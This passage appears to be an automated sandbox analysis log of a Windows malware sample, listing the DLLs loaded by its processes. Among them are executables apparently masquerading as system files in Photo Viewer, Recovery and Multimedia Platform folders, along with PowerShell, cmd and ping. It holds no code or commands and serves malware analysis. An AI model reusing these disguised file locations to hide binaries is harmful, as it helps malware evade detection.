                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mscoree.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: apphelp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: kernel.appcore.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: version.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: uxtheme.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: wldp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: amsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: userenv.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: profapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: windows.storage.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptsp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rsaenh.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptbase.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: sspicli.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: mscoree.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: kernel.appcore.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: version.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: uxtheme.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: wldp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: amsi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: userenv.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: profapi.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: windows.storage.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptsp.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: rsaenh.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: cryptbase.dll
                    Source: C:\Recovery\USZqVcJFLA.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeSection loaded: vcruntime140_clr0400.dll
